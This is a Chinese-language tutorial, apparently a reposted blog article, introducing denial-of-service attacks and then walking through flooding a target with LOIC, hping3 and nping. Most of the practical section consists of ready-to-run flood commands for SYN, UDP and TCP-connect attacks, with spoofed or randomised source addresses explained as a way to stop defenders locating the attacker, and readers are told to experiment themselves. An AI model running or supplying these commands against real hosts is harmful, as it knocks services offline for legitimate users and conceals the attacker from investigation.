簡介

概念：

DoS攻擊通常是利用傳輸協(xié)議的漏洞、系統(tǒng)存在的漏洞、服務(wù)的漏洞，對(duì)目標(biāo)系統(tǒng)發(fā)起大規(guī)模的進(jìn)攻，用超出目標(biāo)處理能力的海量數(shù)據(jù)包消耗可用系統(tǒng)資源、帶寬資源等，或造成程序緩沖區(qū)溢出錯(cuò)誤，致使其無法處理合法用戶的正常請(qǐng)求，無法提供正常服務(wù)，最終致使網(wǎng)絡(luò)服務(wù)癱瘓，甚至引起系統(tǒng)死機(jī)。這是破壞攻擊目標(biāo)正常運(yùn)行的一種“損人不利己”的攻擊手段。

最常見的DoS攻擊行為有網(wǎng)絡(luò)帶寬攻擊和連通性攻擊。帶寬攻擊指以極大的通信量沖擊網(wǎng)絡(luò)，使得所有可用網(wǎng)絡(luò)資源都被消耗殆盡，最后導(dǎo)致合法的用戶請(qǐng)求無法通過。連通性攻擊指用大量的連接請(qǐng)求沖擊計(jì)算機(jī)，使得所有可用的操作系統(tǒng)資源都被消耗殆盡，最終計(jì)算機(jī)無法再處理合法用戶的請(qǐng)求。

分類：

主要有Land攻擊、死亡之ping、淚滴、Smurf攻擊及SYN洪水等。

實(shí)驗(yàn)內(nèi)容

這次我們主要介紹簡單關(guān)于TCP，UDP等相關(guān)攻擊的工具的使用

一：使用LOIC（盧瓦，低軌道離子炮）攻擊

最知名的DOS工具之一，黑客組織匿名者官方使用工具。支持TCP/UDP/HTTP大規(guī)模流量泛洪。

LOIC使用方法

1、選擇URL或IP；

2、設(shè)置攻擊模式(HTTP,UDP,TCP)、端口號(hào)(PORT)、線程(Threads)、速度(可拉)

3、啟動(dòng)攻擊（點(diǎn)擊IMMA CHARGIN MAH LAZER）

4、效果（開啟Wireshark抓包）

二：使用hping3（kali）進(jìn)行DoS攻擊

• -c：發(fā)送數(shù)據(jù)包的個(gè)數(shù)
• -d：每個(gè)數(shù)據(jù)包的大小
• -S：發(fā)送SYN數(shù)據(jù)包
• -w：TCP window大小
• -p：目標(biāo)端口，你可以指定任意端口
• –flood：盡可能快的發(fā)送數(shù)據(jù)包
• –rand-source：使用隨機(jī)的IP地址，使得安全設(shè)備不能定位實(shí)際IP；
• -a或–spoof：隱藏主機(jī)名
• com：目的IP地址或網(wǎng)站

例：使用hping3進(jìn)行TCP攻擊

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source ip/域名

還有很多攻擊方式如：

SYN? Flood

# hping3 -S --flood -V testsite.com

UDP Flood

– hping3 -a?1.1.1.1 --udp -s 53 -d 100 -p 53 --flood?1.1.1.2

-s:指定源端口，不指定也可以

方法還有很多就不截圖了大家自己去調(diào)試！

三：使用Nping3（kali）進(jìn)行DoS攻擊

TCP全鏈接DoS攻擊
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
--tcp-connect：建立tcp連接 --rate=10000：速率一萬個(gè)

例：使用nping實(shí)現(xiàn)TCP連接攻擊：

# nping --tcp-connect -rate=90000 -c 900000 -q ip/域名

總結(jié)

以上是生活随笔為你收集整理的网络安全之DOS攻击的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。